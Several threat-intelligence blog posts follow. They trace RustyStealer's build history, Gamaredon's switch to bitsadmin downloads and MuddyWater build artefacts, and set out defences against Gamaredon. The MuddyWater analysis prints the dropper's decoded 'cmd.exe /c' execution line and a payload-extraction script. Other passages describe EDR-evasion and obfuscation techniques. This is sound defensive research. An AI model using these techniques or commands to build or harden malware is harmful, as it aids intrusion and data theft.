File HashCompile Date
ddc6e6c76ac325d89799a50dffd11ec69ed3b5341740619b8e595b8068220914Tue Sep 23 10:44:52 2025
e081bc408f73158c7338823f01455e4f5185a4365c8aad1d60d777e29166abbdSun Oct 19 21:17:34 2025
e61b2ed360052a256b3c8761f09d185dad15c67595599da3e587c2c553e83108Sun Nov 16 23:41:42 2025
a2001892410e9f34ff0d02c8bc9e7c53b0bd10da58461e1e9eab26bdbf410c79Sun Nov 16 23:41:42 2025
7523e53c979692f9eecff6ec760ac3df5b47f172114286e570b6bba3b2133f58Mon Jan 5 06:33:07 2026
TLSH similarity analysis

As a final preprocessing step I generated TLSH hashes for all samples.

TLSH is a fuzzy hashing algorithm that does not aim for exact equality, but instead quantifies structural similarity between files.
Unlike cryptographic hashes, TLSH allows us to estimate how closely two binaries resemble each other internally even if they differ in resources, padding, timestamps or small code changes.

For our malware analysis purpose, this is especially useful when clustering variants, detecting rebuilds and separating development branches.

To make the distances reproducible, I wrote a small script that computes TLSH values directly from the binaries and performs pairwise comparisons:

Clustering the samples

With all of this data available, we can now perform a reasonably robust clustering of the samples

The key point here is that no single metric is deciding on its own. Instead, the correlation of multiple independent signals matters:

  • TLSH similarity
  • Compile timestamps
  • Library fingerprints
  • Embedded user artefacts
Cluster 1: Core codebase

The first cluster represents the actual core of the codebase and contains the samples:

  • e081bc408f73158c7338823f01455e4f5185a4365c8aad1d60d777e29166abbd
  • e61b2ed360052a256b3c8761f09d185dad15c67595599da3e587c2c553e83108
  • a2001892410e9f34ff0d02c8bc9e7c53b0bd10da58461e1e9eab26bdbf410c79

All three share identical lib dependencies and are compiled close together in time, two of them even share the exact same compile timestamp. One sample also contains the user artefact "Bruno", which further hints to a consistent build environment.

Despite moderate TLSH distance to some variants, the internal similarity inside this cluster remains high enough to confidently assume a shared codebase.

Cluster 2: Early feature branch

A second, clearly separable cluster consists solely of:

  • ddc6e6c76ac325d89799a50dffd11ec69ed3b5341740619b8e595b8068220914

This sample extends the otherwise stable library stack with an additional winreg dependency while remaining TLSH-close to the core samples.
Combined with its earlier compile timestamp, i think this a temporary feature branch or experiment rather than a fully independent development line.

Cluster 3: Later modernization branch

The third cluster is represented by:

  • 7523e53c979692f9eecff6ec760ac3df5b47f172114286e570b6bba3b2133f58

The build differs by multiple additional libraries and introduces a newer version of rustc-demangle.
Additionally, a different username ("Jacob") appears in the artefacts.
While the TLSH distance still places this sample within the same family, it consistently sits outside the tighter core cluster range.
Taken together, this strongly indicates a later development branch with an updated toolchain and likely expanded functionality

Overall, this results in a three-tier model:

  • A stable core cluster forming the technical baseline
  • An early feature branch with minimal extension
  • A later modernization branch with a changed toolchain and build environment

My clustering is not driven by hash similarity alone, but only becomes reliable through the combined temporal, structural and artefact based corelation. It also provides insight into development practices, build discipline and potential role separation within the development process of the malware

Version mapping

Based on this clustering, I derived the following version mapping:

VersionSample (SHA256)Compile DateClusterBesonderheitenDeveloper
v0.9ddc6e6c76ac325d89799a50dffd11ec69ed3b5341740619b8e595b806822091423.09.2025Registry-Branch+ winreg library (Feature-Experiment)unknown
v1.0e081bc408f73158c7338823f01455e4f5185a4365c8aad1d60d777e29166abbd19.10.2025CoreBaseline ToolchainBruno
v1.1e61b2ed360052a256b3c8761f09d185dad15c67595599da3e587c2c553e8310816.11.2025CoreParallel Build, stabiler StackBruno
v1.1ba2001892410e9f34ff0d02c8bc9e7c53b0bd10da58461e1e9eab26bdbf410c7916.11.2025CoreParallel Build (gleicher Timestamp)Bruno
v2.07523e53c979692f9eecff6ec760ac3df5b47f172114286e570b6bba3b2133f5805.01.2026Jacob-BranchNeue Libs + neue rustc-demangleJacob

At this point we already have a solid structural overview without having touched the actual code yet. This part comes next.

For the code comparison I use Ghidras Version Tracking module. The versions will be analyzed in the following pairs:

v0.9 <-> v1.0
v1.0 <-> v1.1
v1.1 <-> v2.0

So three comparisons in total which honestly is still a very manageable workload

Let’s get started 🙂

Version Tracking workflow

I won’t go into a full tutorial on how Ghidras Version Tracking works. Instead, I’ll briefly outline my simple workflow for today.

First, I set the confidence filter to:

-1.0 -> 0.950

Everything above that can usually be assumed identical across samples. I select all those findings and accept them in bulk.

For the remaining findings, I set up a small quality-of-life shortcut:

SHIFT + T = Assign Tag

Then I filter the results by:

  • Tag (ascending)
  • Type (ascending)
  • Status (ascending)

and tighten the confidence filter slightly to:

-1.0 → 0.95

This gives me a clean view of all unresolved function-level differences without assigned tags, exactly the changes that matter most when identifying structural evolution.

It looks roughly like this:

The workflow is simple:

  • Select the next finding
  • Open code comparison (SHIFT + C)
  • If identical -> accept (SHIFT + A)
  • If different -> assign a tag for later analysis (SHIFT + T)

Once accepted or tagged, the finding disappears from the filtered view and I repeat the process.

I iterate this until all relevant changes are reviewed and documented.


RustyStealer: Evolution from v0.9 to v2.0

What changed, what failed and what the developer learned

During a longitudinal analysis of multiple RustyStealer builds, four development stages become visible for me: an early baseline version (v0.9), a cleanup iteration (v1.0), a short-lived performance refactor (v1.1) and a more fundamental architectural shift in v2.0.

Rather than showing linear feature growth, the samples show a realistic iterative engineering process with experimentation, rollback and eventual consolidation toward stealth and reliability.

This analysis focuses on behavioral deltas inferred from import-level changes and binary artifacts.


Version 0.9: Early baseline and rough edges

The earliest observed build (v0.9) represents a relatively raw implementation.

Notable characteristics:

  • Dependency artifacts included unused crates such as winreg / windows-registry ( i guess early experimentation or leftover scaffolding)
  • No meaningful behavioral differences compared to later v1.0 builds
  • No advanced memory manipulation or cryptographic primitives observed
  • Limited internal abstraction and minimal architectural complexity

From a development POV, v0.9 looks like a staging build that still contained residual dependencies and experimental code paths that were not yet cleaned up.


Version 1.0: Cleanup and stabilization

The transition from v0.9 to v1.0 did not introduce meaningful functional changes. The most visible difference was the removal of unused dependency artifacts (such as the winreg crate) without any observable change in imports or runtime behavior.

This looks more like a dependency cleanup rather than a behavioral refactor

Key observations:

  • No changes in imported Windows APIs
  • No observable change in capabilities or execution flow
  • Binary differences consistent with rebuild noise and dependency graph cleanup

This phase reflects basic project hygiene rather than feature development.


Version 1.1: Performance experiment and internal refactor

Version 1.1 marks the first technically ambitious change

Major changes observed:

Introduction of asynchronous and overlapped file I/O:

  • ReadFile, NtReadFile
  • GetOverlappedResult, CancelIo
  • Event-based synchronization (CreateEventW, WaitForMultipleObjects)

Migration to modern Windows path resolution via SHGetKnownFolderPath.

Explicit memory cleanup for shell APIs using CoTaskMemFree.

Removal of host fingerprinting:

  • GetComputerNameExW
  • GetUserNameW
  • NetGetJoinInformation

This version appears to have attempted:

  • Faster and more scalable file harvesting.
  • Cleaner filesystem abstraction.
  • Reduced behavioral noise by temporarily disabling host profiling.

However, asynchronous I/O pipelines significantly increase complexity and often cause instability in realworld environments
This version looks more like a technical experiment rather than a long term production design for me

Additional findings from later code diffs

Looking at later builds and comparing them back to this branch reveals several important follow-up changes that appear to originate from the 1.1 refactor.

String handling and Defender artefacts

Older builds still expose cleartext strings such as direct Windows Defender directory paths, making static detection trivial.
In later builds these strings disappear entirely and are reconstructed at runtime using multiple XOR-based decoding routines and different key constants.

I believe the outcome of the 1.1 refactor was the realization that static strings were becoming a liability, leading to systematic runtime string decryption in subsequent versions.

Collection handling and stability

Later builds include additional safety checks when aggregating dynamic collections (explicit overflow protection when joining result sets)
The same logic exists in earlier builds but is less defensive and less structured.

This points to stability issues encountered when processing larger data sets, which maybe were discovered during or shortly after the scalability experiments introduced in version 1.1.

Modular architecture continuity

Both older and newer builds continue to reference internal Rust modules such as:

  • src\modules\persist.rs
  • src\modules\interface.rs
  • src\modules\information.rs
  • src\modules\detect_av.rs

It confirms that the internal refactor in 1.1 successfully established a modular layout that later versions could iterate on without further structural changes.

Toolchain and build artefacts

Later samples expose more Rust toolchain artefacts (stable-x86_64 paths and related metadata) and show noticeable hash divergence despite similar functionality.
This looks like a change in compiler version or build environment after this refactor phase, which may also explain subtle behavioral and binary layout differences between closely related samples.

My take

Version 1.1 looks like the point where the developers started stress testing their own architecture.

They might have pushed performance and concurrency, simplified some noisy host profiling and cleaned up API usage.
The follow-up changes visible in later diffs show that this experiment exposed two main pain points:

  • Static strings and predictable artefacts were too easy to signature.
  • Increased scale and concurrency exposed stability issues in collection handling.

Instead of doubling down on complex async I/O, later versions appear to focus more on obfuscation, robustness and operational reliability, while keeping the modular structure introduced here.

imo 1.1 feels less like a production release and more like a learning phase that shaped the technical direction of everything that followed.


Version 2.0: Architectural consolidation and stealth optimization

Version 2.0 represents a clear update in development priorities.

Instead of further expanding the async pipeline, the developer reverted many of the experimental components and focused on stealth, operational control and internal maturity.

Major changes observed:

Removal of asynchronous file pipeline

All overlapped I/O and event-based sync primitives present in v1.1 have been fully removed in v2.0 and later builds. No replacement async scheduling mechanisms (IOCP, APCs, worker pools or deferred execution patterns) are observable in the call graph.

The runtime execution flow is now strictly sequential, with simplified synchronization primitives replacing the earlier concurrency model.
It looks like the experimental async pipeline was abandoned in favor of a more predictable and operationally stable execution model.
It reduces architectural complexity, lowers race condition risk and improves long-term stability across victim environments.
All overlapped I/O and event-based synchronization APIs were removed, indicating that the v1.1 experiment was abandoned in favor of a simpler and more predictable execution model.

Reintroduction of host fingerprinting

Host identification APIs returned:

  • GetComputerNameExW
  • GetUserNameW
  • NetGetJoinInformation

Focus on victim profiling, campaign correlation and backend attribution logic
The temporary removal in v1.1 now appears to have been an experimental privacy / noise reduction phase rather than a permanent design direction.

Migration towards native NT APIs

Several subsystems were migrated towards native system calls:

  • Named pipes moved from CreateNamedPipeW to NtCreateNamedPipeFile
  • File handling introduced NtOpenFile

This reduces visibility to user-mode API hooking and increases resistance against common EDR userland instrumentation.

Introduction of cryptographic randomness and entropy hardening

Version 2.0 introduces a dedicated entropy generation pipeline based on SystemFunction036 (RtlGenRandom), replacing the previously implicit and largely deterministic behavior.

Rather than simply requesting random bytes, the implementation builds a full entropy pool that combines cryptographically secure randomness with adaptive jitter-based sampling and internal quality validation.
The generated entropy is statistically evaluated at runtime and rejected if it fails basic stability and distribution thresholds.
Only entropy that passes these health checks is propagated further into the execution flow.

The call chain shows that the generated randomness directly feeds into subsequent runtime decoding routines, where multiple obfuscated data blocks are reconstructed through XOR-based transformations and dynamic key. In earlier versions, these decode paths relied almost entirely on static constants and predictable transformations.
In v2.0, parts of this process become entropy-dependent and therefore non-deterministic across executions

From an operational perspective this has several implications:

  • Runtime decoding behavior becomes less reproducible for static analysis and sandbox instrumentation.
  • Signature-based detection and clustering become more fragile, as internal state and derived values differ per execution.
  • Correlation across samples using hash similarity, instruction-level signatures or deterministic unpacking pipelines becomes significantly harder.
  • The malware gains a higher degree of resilience against emulation environments with weak or manipulated entropy sources.

While the mechanism could theoretically support use cases such as object naming, session identifiers or cryptographic material, the integration into the decode pipeline indicates more that the primary motivation is obfuscation hardening and stealth rather than feature expansion

It marks a shift in development priorities: the developers invest in making existing functionality harder to observe, reproduce and classify

Memory protection manipulation (VirtualProtect)

VirtualProtect appears in v2.0, but not as a generic “unpacking” indicator.

It is used to flip a read-only dispatch table to writable just long enough to store dynamically resolved API pointers, then lock it back down.
Thats consistent with the shift towards runtime API resolving and NT-level calls: fewer static imports, less signature surface and a resolver layer that is harder to tamper with or trivial hook

Internal synchronization refactor

Thread state handling was refactored away from TLS primitives and migrated towards modern synchronization APIs (InitializeCriticalSectionEx)

I think it’s for architectural cleanup and improved concurrency control.

Obfuscation hardening and decoder abstraction

Compared to version 1.1, version 2.0 further abstracts string decryption and reconstruction logic.
Previously visible XOR decoders with fixed constants and static data offsets were refactored into more generic reconstruction helpers and indirect decode routines.

This significantly reduces static signature stability and increases the effort required for automated clustering and YARA-style detection.

Improved memory lifecycle management and cleanup paths

Version 2.0 introduces more explicit cleanup sequences, callback-based destructors and tighter buffer lifecycle handling.

Multiple teardown paths now explicitly free dynamically allocated buffers, invoke destructor callbacks and normalize internal state after large collection operations.
It might be an effort to reduce memory leaks, crash probability and long-running instability during high-volume data processing.

Build pipeline evolution

Build artifacts show a different Rust toolchain and build environment compared to version 1.1.
Toolchain paths shifted from shared “Archer” layouts towards user-local rustup environments, explaining observed TLSH divergence despite largely stable runtime behavior.

This reflects internal “”””build pipeline”””” changes rather than functional malware changes.

Summary

Version 2.0 prioritizes:

  • Simplification and rollback of risky experimental I/O designs
  • Stronger stealth via native API usage and obfuscation hardening
  • Improved runtime stability and memory hygiene
  • Reintroduction of host profiling for operational correlation
  • Internal architectural consolidation rather than feature expansion

Overall, this release reflects a stabilization phase where operational reliability and detection resistance outweigh rapid feature development


Conclusion

If there’s one takeaway from this exercise, it’s that even relatively “boring” commodity implants become surprisingly interesting once you stop treating them as static blobs and start treating them like evolving software projects.

By correlating build artefacts, dependency drift, fuzzy hashes and targeted code diffs, we can reconstruct a fairly coherent development timeline for RustyStealer without having to reverse every single function into oblivion. We see experimentation phases (hello async pipeline), rollbacks when ideas don’t survive real-world friction, hardening towards stealth (dynamic API resolution, entropy injection) and the usual toolchain churn that comes with real developers shipping real code, even if that code happens to be malware.
None of this magically turns RustyStealer into some nextgen cyber superweapon. It’s still fundamentally a fairly standard implant doing fairly standard implant things.
Also it’s a nice reminder that “grep strings > extract a few IOCs > call it a day” only gets you so far. If you actually want to understand how an actor operates, what they experiment with and where their engineering effort goes, you have to look at trends, not snapshots.
Which admittedly takes more time, more coffee and slightly more patience than copy-pasting hashes into VirusTotal buuuut the payoff is a much clearer picture of what’s really going on under the hood.

There’s also a more general lesson in all of this imo

If the goal is to actually understand a threat actor, not just label a sample and move on, then obsessing over individual functions, opcodes and micro-optimizations only gets you part of the way.
That level of detail is useful, but it doesnt tell you how the tooling evolves, where engineering effort is invested, which ideas get abandoned or how operational priorities shift over time.
These signals live in the truly boring parts: build artefacts, dependency drift, architectural refactors, version churn and the occasional accidental breadcrumb left behind in a binary or wherever.
When you line those up over multiple samples, you start seeing intent and process instead of isolated behaviour and this exactly what we want ^-^

Gamaredon: Now Downloading via Windows Updates Best Friend “BITS”

by Robin Dost


There’s yet another update in Gamaredons GamaLoad scripts, which pushed me to write this article and to slightly revisit my previous post Defending Against Gamaredon: Practical Controls That Actually Work.

In this article, I distinguish between GamaLoad and Pterodo. I still consider GamaLoad a transitional stage, primarily implemented as a defensive layer to slow down analysis rather than as a fundamentally new capability.
That said, there are visible changes both in payload delivery and in obfuscation.

I’ll mainly focus on what has changed since my last posts. If you’re interested in the broader context and historical behavior, have a look at the previous articles first.

For this analysis, I pulled the latest Gamaredon sample with the hash:

3538618e0ae0f7e73d96843d90323178b1d434262a074fc24be8e36283e7dd92

and dropped it straight into my tracking framework.

From a delivery perspective, not much has changed compared to Gamaredons last shift. The victim still receives a RAR archive as an attachment. When opened or extracted, it drops an HTA file into the Startup folder, infecting the system on the next reboot.
A few minutes later, my tracking system already picked up the first fresh GamaLoad samples for analysis.

When comparing these new samples to the December 2025 batch, one thing immediately stood out:
they are almost twice as large and noticeably more obfuscated.

(Left column: line count, right column: hash+date)

The obfuscation hasn’t just increased (which, honestly, doesn’t help much given how terrible Gamaredons obfuscation usually is :D), but it has also become slightly smarter.

Historically, their scripts contained tons of junk loops that served absolutely no purpose and could simply be deleted during manual deobfuscation. In the newer samples, however, more variables defined inside those junk blocks are later reused in the actual execution flow.

So if you’re still deobfuscating by hand or your automation isn’t fully mature yet, you’ll want to be a bit more careful here.

(Variable larkxGg is defined in the junk loop, but used after it)

The Interesting Part

A few days ago, I published an article showing how surprisingly easy it is to defend against Gamaredon by blocking a small set of Windows tools such as mshta.exe or MSXML2.XMLHTTP.
If you’re honest about it, Gamaredon’s tooling is… let’s say “not exactly impressive”. Blocking a handful of abused LOLBins already makes payload delivery painfully difficult for them. Their development is slow, incremental, and often fairly predictable.

Well, i guess they noticed.

The defensive measures described in that article have now been bypassed.
Don’t worry though, we’ll adjust accordingly 😁

Fallback on Fallback: Now Featuring BITS


The new GamaLoad script still relies on a familiar fallback structure to retrieve and execute payloads from their delivery infrastructure.

Conceptually, this is very simple: the script keeps trying different URLs until one successfully returns a payload. If everything fails, an empty string is returned.

What’s new is that this fallback logic now has… another fallback.

If no payload stage can be retrieved via the usual mechanisms, the script switches to downloading the payload using bitsadmin.

What is bitsadmin?

bitsadmin is a Windows utility used to control the Background Intelligent Transfer Service (BITS), which provides reliable background downloads and uploads.
Attackers abuse it as a Living-off-the-Land Binary (LOLBin) to quietly retrieve payloads without dropping additional tooling onto disk.

From an attacker’s perspective, BITS has some very attractive properties:

  • resilient background transfers
  • native proxy support
  • high reliability on unstable networks
  • no obvious “malware-looking” process tree

exactly the kind of boring enterprise plumbing malware loves to hide in ^^


Why Gamaredon Switched to BITS

For years, Gamaredon heavily relied on classic LOLBins such as mshta.exe and MSXML2.XMLHTTP for payload delivery and execution.
By now, these techniques are:

  • blocked by default in many environments (AppLocker, ASR rules, EDR hardening)
  • trivial to detect via signatures and behavior
  • operationally noisy (suspicious child processes, script artifacts, obvious telemetry)

BITS lives in a much more comfortable gray zone:

  • it supports persistent and robust downloads
  • it is actively used by Windows itself (Windows Update, Defender, Office, etc.)
  • blocking it outright often creates operational risk in enterprise environments
  • its network traffic looks boring and legitimate (svchost.exe, Microsoft-like headers)
  • it works reliably behind proxies and restrictive networks

if your previous delivery pipeline keeps getting kicked in the teeth by defenders, BITS is a logical next step even for an actor whose tooling evolution is usually measured in geological time.

Is This a Problem?

Not really.

In my article Defending Against Gamaredon: Practical Controls That Actually Work, I now show how you can effectively mitigate BITS abuse without breaking normal business operations.

So yes: Gamaredon adapted.
And yes we’ll adapt again. That’s kind of the point. 🙂

MuddyWater: When Your Build System Becomes an IOC – “Jacob”


by Robin Dost

EDIT 2026-01-18: I published a follow-up article analyzing the evolution and version history of the latest RustyStealer samples, focusing on change tracking, tooling evolution, and architectural shifts across multiple builds

Today I was bored, so I decided to take a short break from Russian threat actors and spend a day with our friends from Iran instead.
I grabbed a sample attributed to MuddyWater (hash: "f38a56b8dc0e8a581999621eef65ef497f0ac0d35e953bd94335926f00e9464f", sample from here) and originally planned to do a fairly standard malware analysis.

That plan lasted about five minutes.

What started as a normal sample quickly turned into something much more interesting for me:
the developer didn’t properly strip the binary and left behind a lot of build artefacts, enough to sketch a pretty solid profile of the development toolchain behind this malware.

In this post I won’t go into a full behavioral or functional analysis of the payload itself.
Instead, I’ll focus on what we can learn purely from the developers mistakes, what kind of profile we can derive from them and how this information can be useful for clustering and campaign tracking.
A more traditional malware analysis of this sample will follow in a future post.

Quick Context: Who Is MuddyWater Anyway?

Before going any further, a quick bit of context on MuddyWater, because this part actually matters for what follows.

MuddyWater is a long-running Iranian threat actor commonly associated with the Iranian Ministry of Intelligence and Security (MOIS). The group is primarily known for espionage-driven operations targeting government institutions, critical infrastructure, telecommunications and various organizations across the Middle East and parts of Europe.

This is not some random crimeware operator copy-pasting loaders from GitHub like script kiddies.
We’re talking about a mature, state-aligned actor with a long operational history and a fairly diverse malware toolkit.

Which is exactly why the amount of build and development artefacts left in this sample is so interesting.


The initial sample is a .doc file.
Honestly, nothing fancy just a Word document with a macro that reconstructs an EXE from hex, writes it to disk and executes it. Classic stuff.

I started with oleid:

oleid f38a56b8dc0e8a581999621eef65ef497f0ac0d35e953bd94335926f00e9464f.doc

As expected, the document contains VBA macros, so next step:

olevba --analysis f38a56b8dc0e8a581999621eef65ef497f0ac0d35e953bd94335926f00e9464f.doc

Clearly malicious. No surprises here.
To get a closer look at the macro itself, I exported it using:

olevba -c f38a56b8dc0e8a581999621eef65ef497f0ac0d35e953bd94335926f00e9464f.doc > makro.vba

Now we can see the actual macro code:

Apart from some typos and random variable names, most of this is just junk code.
What actually happens is pretty straightforward:

  • WriteHexToFile takes a hex string from UserForm1.TextBox1.Text, converts it to bytes and writes it to:
    C:\ProgramData\CertificationKit.ini
  • love_me__ constructs the following command from ASCII values:
99 109 100 46 101 120 101 = cmd.exe
32 47 99 32 = /c
67 58 92 80 114 111 + "gramData\CertificationKit.ini"
= C:\ProgramData\CertificationKit.ini

Final result:

cmd.exe /c C:\ProgramData\CertificationKit.ini

While the payload shows a clear shift towards modern Rust-based tooling, the document dropper still relies on “obfuscation” techniques that wouldn’t look out of place in early 2000s VBA malware. Turning strings into ASCII integers and adding unreachable trigonometric conditions mostly just makes human analysts roll their eyes. It provides essentially zero resistance against automated analysis, but hey, let’s move on.


Extracting the Payload

To extract the binary cleanly, I wrote a small Python script:

CLICK TO OPEN
# Author: Robin Dos 
# Created: 10.01.2025
# This scripts extracts binary from a muddywater vba makro

#!/usr/bin/env python3
import re
import sys
from pathlib import Path
import olefile

DOC = Path(sys.argv[1])
OUT = Path(sys.argv[2]) if len(sys.argv) > 2 else Path("payload.bin")

STREAM = "Macros/UserForm1/o"

def main():
    if not DOC.exists():
        raise SystemExit(f"File not found: {DOC}")

    ole = olefile.OleFileIO(str(DOC))
    try:
        if not ole.exists(STREAM.split("/")):
            # list streams for troubleshooting
            print("stream not found. Available streams:")
            for s in ole.listdir(streams=True, storages=False):
                print("    " + "/".join(s))
            raise SystemExit(1)

        data = ole.openstream(STREAM.split("/")).read()
    finally:
        ole.close()

    # Extract long hex runs
    hex_candidates = re.findall(rb"(?:[0-9A-Fa-f]{2}){200,}", data)
    if not hex_candidates:
        raise SystemExit("[!] No large hex blob found in the form stream.")

    hex_blob = max(hex_candidates, key=len)
    # clean (jic) and convert
    hex_blob = re.sub(rb"[^0-9A-Fa-f]", b"", hex_blob)

    payload = bytes.fromhex(hex_blob.decode("ascii"))
    OUT.write_bytes(payload)

    print(f"wrote {len(payload)} bytes to: {OUT}")
    print(f"first 2 bytes: {payload[:2]!r} (expect b'MZ' for PE)")

if __name__ == "__main__":
    main()

In the end I get a proper PE32+ executable, which we can now analyze further.

SHA256 of the extracted payload:

7523e53c979692f9eecff6ec760ac3df5b47f172114286e570b6bba3b2133f58

If we check the hash on VirusTotal, we can see that the file is already known, but only very recently:

We also get multiple attributions pointing toward MuddyWater:

So far, nothing controversial, this is a MuddyWater RustyStealer Sample as we’ve already seen before.


Build Artefacts: Where Things Get Interesting

Now that we have the final payload, I loaded it into Ghidra.
First thing I always check: strings.

And immediately something interesting pops up:

The binary was clearly not properly stripped and contains a large amount of leftover build artefacts.
Most notably, we can see the username “Jacob” in multiple build paths.

No, this does not automatically mean the developers real name is Jacob.
But it does mean that the build environment uses an account named Jacob and that alone is already useful for clustering.

I went through all remaining artefacts and summarized the most interesting findings and what they tell us about the developer and their environment.

Operating System

Windows

Evidence:

C:\Users\Jacob\...
C:\Users\...\rustup\toolchains\...
windows-registry crate
schannel TLS

This was built natively on Windows.
No Linux cross-compile involved.

Programming Language & Toolchain

Rust (MSVC Toolchain)

Evidence:

stable-x86_64-pc-windows-msvc
.cargo\registry
.rustup\toolchains

Target Triple:
x86_64-pc-windows-msvc

This is actually quite useful information, because many malware authors either:

  • build on Linux and cross-compile for Windows or
  • use the GNU toolchain on Windows

Here we’re looking at a real Windows dev host with Visual C++ build tools installed

Username in Build Paths

C:\Users\Jacob\

Again, not proof of identity, but a very strong clustering indicator.
If this path shows up again in other samples, you can (confidently) link them to the same build environment or toolchain.

Build Quality & OPSEC Trade-Offs

The binary contains:

  • panic strings
  • assertion messages
  • full source paths

Examples:

  • assertion failed: ...
  • internal error inside hyper...

Which suggests:

  • no panic = abort
  • no aggressive stripping
  • no serious release hardening focused on OPSEC

development speed and convenience clearly won over build sanitization

Which is honestly pretty typical for APT tooling, but this is still very sloppy ngl

Dependency Stack & Framework Fingerprint

Crates and versions found in the binary:

  • atomic-waker-1.1.2
  • base64-0.22.1
  • bytes-1.10.1
  • cipher-0.4.4
  • ctr-0.9.2
  • futures-channel-0.3.31
  • futures-core-0.3.31
  • futures-util-0.3.31
  • generic-array-0.14.7
  • h2-0.4.12
  • hashbrown-0.15.5
  • http-1.3.1
  • httparse-1.10.1
  • http-body-util-0.1.3
  • hyper-1.7.0
  • hyper-tls-0.6.0
  • hyper-util-0.1.16
  • icu_normalizer-2.0.0
  • idna-1.1.0
  • indexmap-2.11.0
  • ipnet-2.11.0
  • iri-string-0.7.8
  • mio-1.0.4
  • percent-encoding-2.3.2
  • rand-0.6.5
  • reqwest-0.12.23
  • smallvec-1.15.1
  • socket2-0.6.0
  • tokio-1.47.1
  • tower-0.5.2
  • universal-hash-0.5.1
  • url-2.5.7
  • utf8_iter-1.0.4
  • want-0.3.1
  • windows-registry-0.5.3

What information we can extract from this:

Network Stack

  • Async HTTP client (reqwest)
  • Full hyper stack (hyper, hyper-util, http, httparse)
  • HTTP/1.1 and HTTP/2 support (h2)
  • TLS via Windows Schannel (hyper-tls)
  • Low-level socket handling (socket2, mio)

So this is very clearly not basic WinInet abuse or some minimal dl logic
It’s somehwat a full-featured HTTP client stack assembled from modern Rust networking libs, with proper async handling.

Looks much more like a persistent implant than a simple one-shot loader.

Async Runtime

  • tokio
  • futures-*
  • atomic-waker

This strongly suggests an event-driven design with concurrent tasks, typical for beaconing, task polling and long-running background activity.

Not what you would expect from a disposable stage loader.

Crypto

  • cipher
  • ctr
  • universal-hash
  • generic-array
  • plus base64

Active use of AEAD-style primitives, very likely AES-GCM or something close to it.

Which looks for me like:

  • encrypted embedded configuration
  • and/or encrypted C2 communication

Either way, encryption is clearly part of the design

rustc-demangle

Also one telling artefact is the presence of source paths from the rustc-demangle crate, including references to .llvm./rust/deps/.../src/lib.rs

These are build-time paths leaking straight out of the developers Cargo environment. In my opinion this means that panic handling and backtrace support were left enabled, instead of using an aggressive panic=abort and stripping strategy.

Local Development Environment

Paths like:

.cargo\registry\src\index.crates.io-1949cf8c6b5b557f\

Indicate:

  • standard Cargo cache layout
  • no Docker build
  • no CI/CD path patterns

This was almost certainly built locally on the developers Windows workstation or VM.
Just someone hitting cargo build on their dev box.
Relatable, honestly

Compiler Version (Indirectly)

Multiple references to:

/rustc/ded5c06cf21d2b93bffd5d884aa6e96934ee4234/

This is the Rust compiler commit hash.

That allows fairly accurate mapping to a Rust release version
(very likely around Rust 1.92.0)

Which is extremely useful for:

  • temporal analysis of campaigns
  • toolchain reuse detection
Internal Project Structure (More Dev Leaks)
src\main.rs
src\modules\persist.rs
src\modules\interface.rs

That tells us a lot:

Modular Architecture
  • persist > persistence module
  • interface > C2 interface or command handling

This is not just a single-purpose loader
This is a modular implant much closer to a full backdoor framework than a simple dropper.


What This Tells Us About the Developer & Operation

Technical Profile

  • Rust developer
  • works on Windows
  • uses MSVC toolchain
  • builds locally, not via CI
  • comfortable with async networking
  • understands TLS and proxy handling

Operational Assumptions

  • expects EDR solutions (found a lot of AV related strings, but not to relevant tbh)
  • expects proxy environments
  • targets corporate networks
  • uses modular architecture for flexibility

OPSEC Choices

  • prioritizes development speed
  • does not heavily sanitize builds
  • accepts leakage of build artefacts (LOL)

Which again fits very well with how many state aligned toolchains are developed:
fast iteration, internal use and limited concern about reverse-engineering friction

From a threat hunting perspective, these artefacts are far more useful than yet another short-lived C2 domain, they allow us to track the toolchain, not just the infrastructure

What Build Artifacts Reveal About Actor Development

Build artifacts embedded in operational malware are more than just accidental leaks they offer a look into an actors internal development maturity.
Exposed compiler paths, usernames, project directories or debug strings strongly suggest the absence of a hardened release pipeline.
In mature development environments, build systems are typically isolated, stripped of identifiable metadata and designed to produce reproducible, sanitized artifacts.
When these indicators repeatedly appear in live payloads, it points to ad-hoc or poorly automated build processes rather than a structured CI/CD workflow
The continued presence of build artifacts across multiple campaigns is particularly telling.
It indicates not just a single operational mistake, but a lack of learning or feedback integration over time. Actors that actively monitor public reporting and adapt their tooling usually remediate these issues quickly.
Those that do not reveal organizational constraints, limited quality assurance or sustained time pressure within their development cycle.
I’ll start to do some more research about MuddyWater in the next few weeks to get a better understanding weather this was a single incident or a general problem in MuddyWaters development process.
Leaving build artefacts in your malware is rarely about “oops, forgot to strip the binary”
It’s more a side effect of how development, testing and deployment are glued together inside the operation.
From a defenders POV, that’s actually way more useful than yet another throwaway C2 domain / IP.
These artefacts don’t rotate every week they give you fingerprints that can survive multiple campaigns.

Defending Against Gamaredon: Practical Controls That Actually Work


by Robin Dost

This is the result of a lengthy analysis and study of the Gamaredon UAC-0010 group. I recommend reading my previous articles for more context.

Defending against Gamaredon is uncomfortable not because the group uses particularly advanced malware, but because it forces defenders to question many assumptions that modern security strategies are built on.

Gamaredon does not rely on sophisticated exploits, stealthy implants or long-lived infrastructure. Instead it operates through large volumes of simple scripts, constantly changing delivery mechanisms and an infrastructure that is designed to burn fast and disappear. Indicators of compromise age out quickly, payloads are interchangeable and even the tooling itself adapts once it becomes the subject of analysis.

Over the past months, tracking Gamaredon has felt less like reverse engineering a malware family and more like observing a process in motion. Loader scripts evolve, obfuscation shifts slightly from wave to wave and infrastructure changes just enough to break automated collection pipelines. At times, analysis environments are actively identified and fed with destructive or misleading payloads, which turns the act of investigation itself into a signal the actor seems to react to.

This makes Gamaredon a poor fit for traditional, indicator driven defense models. Blocking hashes, domains or IP addresses provides short-lived relief at best. By the time a rule is deployed, the campaign maybe has already moved on. What remains stable is not the malware, but the behavior: how access is gained, how scripts are executed, how network communication deviates from normal client behavior and how the actor responds when it detects scrutiny.

This article focuses on defensive measures that have proven effective while actively observing Gamaredon operations in the wild. The goal is not to “out-APT” the attacker, but to break the operational assumptions that Gamaredon relies on: permissive script execution, weak visibility into client behavior and an overreliance on static threat intelligence.

Defending against Gamaredon is less about stopping a specific toolset and more about disrupting a workflow. Once that distinction is understood, the problem becomes significantly more manageable 🙂


What End Users Can Do to Reduce Risk

Remember: Gamaredon does not break into systems. It is invited in

1. Attachments are the attack surface

Gamaredon infects systems through spear phishing. End users who have received appropriate training therefore significantly reduce the risk of infection. Modern phishing campaigns, particularly those operated by actors like Gamaredon, do not rely on obvious deception or complex exploit, they exploit trust in routine actions.
